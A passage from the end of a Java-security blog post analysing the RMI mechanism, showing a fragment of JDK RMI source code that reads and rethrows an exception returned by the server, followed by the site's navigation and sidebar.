TransportConstants.NormalReturn:</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">case</span> TransportConstants.ExceptionalReturn:</span><br><span class="line">        Object ex;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            ex = in.readObject();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">UnmarshalException</span>(<span class="string">&quot;Error unmarshaling return&quot;</span>, e);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// An exception should have been received,</span></span><br><span class="line">        <span class="comment">// if so throw it, else flag error</span></span><br><span class="line">        <span class="keyword">if</span> (ex <span class="keyword">instanceof</span> Exception) &#123;</span><br><span class="line">            exceptionReceivedFromServer((Exception) ex);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">UnmarshalException</span>(<span class="string">&quot;Return type not Exception&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// Exception is thrown before fallthrough can occur</span></span><br><span class="line">    <span class="keyword">default</span>:</span><br><span class="line">        <span class="keyword">if</span> (Transport.transportLog.isLoggable(Log.BRIEF)) &#123;</span><br><span class="line">            Transport.transportLog.log(Log.BRIEF,</span><br><span class="line">                <span class="string">&quot;return code invalid: &quot;</span> + returnType);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">UnmarshalException</span>(<span class="string">&quot;Return code invalid&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2025/03/07/RMI/" data-id="cmmugm2a60007fswqf0t828gl" data-title="RMI机制分析" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2025/03/07/Fastjson/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          Fastjson反序列化分析
        
      </div>
    </a>
  
  
    <a href="/2025/03/07/%E5%86%85%E5%AD%98%E9%A9%AC/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">内存马分析</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/java%E5%AE%89%E5%85%A8/">java安全</a></li></ul>
    </div>
  </div>


  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/03/">March 2025</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/03/17/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20export%EF%BC%8Fexcel%20SQL%E6%B3%A8%E5%85%A5%E5%88%86%E6%9E%90%EF%BC%88%E4%B8%8A%EF%BC%89/">帆软报表 export／excel SQL注入分析（上）</a>
          </li>
        
          <li>
            <a href="/2025/03/07/Fastjson/">Fastjson反序列化分析</a>
          </li>
        
          <li>
            <a href="/2025/03/07/RMI/">RMI机制分析</a>
          </li>
        
          <li>
            <a href="/2025/03/07/%E5%86%85%E5%AD%98%E9%A9%AC/">内存马分析</a>
          </li>
        
          <li>
            <a href="/2025/03/07/CC1--TransformedMap/">CC1</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2026 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>